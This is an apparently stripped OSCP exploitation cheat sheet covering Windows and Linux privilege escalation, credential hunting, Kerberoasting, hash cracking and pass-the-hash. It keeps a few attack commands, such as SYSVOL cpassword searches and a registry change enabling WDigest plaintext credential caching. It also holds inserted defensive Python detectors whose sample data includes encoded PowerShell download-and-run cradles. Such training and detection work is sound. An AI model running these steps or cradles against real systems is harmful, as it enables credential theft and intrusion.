Exploitation (Attack)
All you need to know about basic host-based exploitation for OSCP
Windows Exploitation
Basic commands
Add user
Add a user to a group
Create a local administrator account
Find out Windows System Information
Windows Patch Status
Find Plaintext Password
Find all those strings in config files
Find all passwords in all files
Download files from the attacker box (Kali) to the target via PowerShell
Other downloading and uploading techniques
Download Github repo: https://gist.github.com/jivoi/c354eaaf3019352ce32522f916c03d70
You need to manually edit the PowerShell script so that it runs itself without -C or -Command.
For example, using Invoke-PowerShellTcp.ps1 in /opt/nishang/Shells/Invoke-PowerShellTcp.ps1
Invoke this command manually by appending it to the end of the PowerShell file.
You can copy the file to the victim and execute the command just by invoking DownloadString, without the PowerShell -Command argument. This technique is widely used to create so-called file-less malware, where the malicious script is executed directly in the memory of the victim machine without dropping any file onto the hard disk; it is used to bypass signature-based detection.
Or you can manually invoke the command via a PowerShell string. For example,
Also for PS version 1 and 2
PS Version 1
PS Version 2
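The in-memory DownloadString cradle described above leaves a distinctive command line in process-creation logs, which is where defenders catch it. The following is an added example, not part of the original page: a small Python detector run over constructed sample command lines (the URLs, script names and the encoded payload are all made up here), which also decodes a -enc payload before matching so an encoded cradle does not slip past.

```python
import base64
import re

# Constructed sample command lines (not taken from the page), in the shape a
# process-creation log would record them.
PLAIN_CRADLE = ("powershell.exe -nop -w hidden -c \"IEX (New-Object Net.WebClient)"
                ".DownloadString('http://192.0.2.10/script.ps1')\"")
ENCODED_BODY = "IEX (New-Object Net.WebClient).DownloadString('http://192.0.2.10/x.ps1')"
ENCODED_CRADLE = "powershell.exe -nop -enc " + base64.b64encode(
    ENCODED_BODY.encode("utf-16le")).decode()
SAMPLE_LOGS = [
    PLAIN_CRADLE,
    "powershell.exe -ep bypass -File C:\\scripts\\nightly-backup.ps1",
    ENCODED_CRADLE,
    "cmd.exe /c dir C:\\Users",
]

# Indicators of the in-memory cradle described above: a web client pulling a
# script as a string and handing it to Invoke-Expression, often hidden or encoded.
CRADLE_PATTERNS = [
    (r"downloadstring\s*\(", "DownloadString"),
    (r"\biex\b|invoke-expression", "Invoke-Expression"),
    (r"net\.webclient|invoke-webrequest|\biwr\b", "web client"),
    (r"-w(?:indowstyle)?\s+hidden", "hidden window"),
]

def decode_encoded_command(cmd):
    """Return the decoded -enc/-EncodedCommand payload (UTF-16LE base64), else None."""
    m = re.search(r"-(?:enc|encodedcommand|e)\s+([A-Za-z0-9+/=]+)", cmd, re.I)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1)).decode("utf-16le")
    except (ValueError, UnicodeDecodeError):
        return None

def cradle_indicators(cmd):
    """Names of the patterns present in cmd, scanning any decoded -enc payload too."""
    decoded = decode_encoded_command(cmd)
    text = cmd + " " + decoded if decoded else cmd
    return [name for pat, name in CRADLE_PATTERNS if re.search(pat, text, re.I)]

def find_cradles(lines, min_hits=2):
    """Flag command lines matching at least min_hits indicators as (line, hits)."""
    return [(line, cradle_indicators(line))
            for line in lines if len(cradle_indicators(line)) >= min_hits]
```

Requiring two indicators keeps a legitimate -File script launch from being flagged while the plain and the encoded cradle both are.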
Finding password files in the registry
VNC
Windows autologin
Or via PowerShell, using Get-ItemProperty to read the registry
SNMP Parameters
Putty
Search for passwords in the registry
Finding credentials in Groups.xml
On an attacker box, you can decrypt a Group Policy password via:
Groups.xml can be found under the below path
C:\ProgramData\Microsoft\Group Policy\History\{$numbers}\Machine\Preferences\Groups
To find more information: http://www.fuzzysecurity.com/tutorials/16.html
Finding admin credentials from AppData
Running commands as a different user with the runas command
Enable RDP on a Windows target
Port 88 - Kerberoasting
Once you have a user shell, you can start Kerberoasting to get other users' credentials.
Without password
With password
Then try cracking the Kerberos ticket by
Then login with psexec.py.
You can choose the service name used, to avoid antivirus detection, with --service-name.
Exploiting AD users
You should import the 'activedirectory' module first.
Add an AD member to a Group
Other Useful commands
Strings prints text strings embedded in binary files such as executables.
Transferring files to Windows
Then run
List all scheduled tasks
Other miscellaneous things to check:
Find GPP Passwords in SYSVOL
findstr /S cpassword $env:logonserver\sysvol\*.xml
findstr /S cpassword %logonserver%\sysvol\*.xml (cmd.exe)
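The findstr searches above only tell you that the string cpassword occurs somewhere under SYSVOL. For auditing a domain for leftover Group Policy Preferences passwords, a parser that reports which account in which file still carries a non-empty cpassword is more useful. The following is an added example and not part of the original page; the Groups.xml content is constructed here (the GUIDs are placeholders and the cpassword value is not a real encrypted blob).

```python
import os
import xml.etree.ElementTree as ET

# Constructed Groups.xml sample in the Group Policy Preferences layout (not a real
# capture): one local account still carrying a cpassword, one already cleared.
SAMPLE_GROUPS_XML = """<Groups>
  <User name="LocalAdmin" changed="2019-03-01 10:00:00" uid="{PLACEHOLDER-GUID-1}">
    <Properties action="U" userName="LocalAdmin" changeLogon="0" noChange="1"
        neverExpires="1" acctDisabled="0"
        cpassword="EXAMPLE_BASE64_NOT_A_REAL_CPASSWORD"/>
  </User>
  <User name="Helpdesk" changed="2019-03-02 10:00:00" uid="{PLACEHOLDER-GUID-2}">
    <Properties action="U" userName="Helpdesk" cpassword=""/>
  </User>
</Groups>"""

def find_cpasswords(xml_text, source="<string>"):
    """One finding per element whose cpassword attribute is non-empty."""
    findings = []
    for elem in ET.fromstring(xml_text).iter():
        cp = elem.attrib.get("cpassword")
        if cp:  # an empty value means the password was already removed
            findings.append({
                "file": source,
                "account": elem.attrib.get("userName") or elem.attrib.get("name", "?"),
                "cpassword_len": len(cp),
            })
    return findings

def scan_sysvol(root_dir):
    """Walk a SYSVOL copy and collect findings from every .xml file under it."""
    findings = []
    for dirpath, _, filenames in os.walk(root_dir):
        for fn in filenames:
            if not fn.lower().endswith(".xml"):
                continue
            path = os.path.join(dirpath, fn)
            try:
                with open(path, encoding="utf-8-sig") as fh:
                    findings.extend(find_cpasswords(fh.read(), path))
            except (ET.ParseError, OSError, UnicodeDecodeError):
                continue
    return findings
```

Point scan_sysvol at a mounted or copied SYSVOL share; every finding it returns is a preference item that should be removed and the account's password rotated.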
Run a PowerShell prompt as a different user, without loading the profile on the machine [replace DOMAIN and USER]
runas /user:DOMAIN\USER /noprofile powershell.exe
Insert a registry key to enable WDigest on newer versions of Windows
reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential /t REG_DWORD /d 1
Linux Exploitation
Spawning an interactive TTY Linux shell
Then press Ctrl-Z.
Type reset and hit return.
Exploiting directories
Find any writable directories
Or use
Finding only executable folders
Finding Writable and executable folders
Find commands that you are allowed to run as root with no password
You'll see a result similar to the one below. As you can see, the user shelly can use /usr/bin/perl as root with no password.
e.g.) If you are allowed to use the perl command as root, you can get a reverse shell straight away
If this doesn't give you any hints
Check the kernel version of the victim machine
Try googling the kernel version together with PE (privilege escalation) exploits to try out.
Check the bash history
Check the processes it is running
Finding plaintext passwords in the web server
Plaintext Password in /var/www/html/*.php
In mail
Or using LinEnum.sh
Checking the services it is running
GTFOBins
SUID
SGID
Automation Tools
There are three useful automation tools that I use the most, which are
LinEnum.sh
https://github.com/rebootuser/LinEnum/blob/master/LinEnum.sh
pspy
pspy is a command line tool designed to snoop on processes without need for root permissions.
Other useful commands
List all scheduled tasks
List the capability of a file
Password Cracking
Below is the cracking methodology used in CTF challenges.
Creating a password list
1) You can create your own dictionary, or combine two different wordlists, by
2) Create a customised wordlist from an HTML page
Or use CeWL
-w is the minimum password length.
Cracking Tools
To identify which hash type a hash is, use either of the commands below, which are built into Kali
Online Tools to find Hash Type
Cracking Hash
Two Kali built-in tools can be used, hashcat and john.
Hashcat
-m: hash mode; 13100 denotes Kerberos 5 TGS-REP etype 23
-a: attack mode; 0 denotes straight (dictionary)
-o: output file
John the ripper
KeePass password
PuTTY key (.ppk) to SSH key
Linux shadow password
First you need to combine the passwd file with the shadow file using the unshadow program.
Decoding Base64
Cracking a zip file password
Convert Hex to Binary
Online Tools
Cracking passwords for services
Port 22 - SSH
Cracking a private RSA key
Port 161 - SNMP
Port 3389 - RDP
Port 80/443 - htaccess
Password-protect a directory with .htaccess
Step 1
Create a directory that you want to password-protect. Create a .htaccess file inside that directory. Content of .htaccess:
Create .htpasswd file
This creates a file called .htpasswd with the user test and the password admin.
If the directory does not display a login prompt, you might have to change the apache2.conf file to this:
Then brute-force with
Apache Tomcat
HTTP POST Login Form
Pass The Hash
You can authenticate to services using a valid username and the password hash, without needing to recover the plaintext password.
SMB PTH
e.g.)
RDP PTH
Using evil-winrm: https://github.com/Hackplayers/evil-winrm
Using freerdp-x11
Misc: Windows password check in SAM
You need two fundamental files from Windows: the SYSTEM registry hive and the SAM registry hive.
Then extract the hashed passwords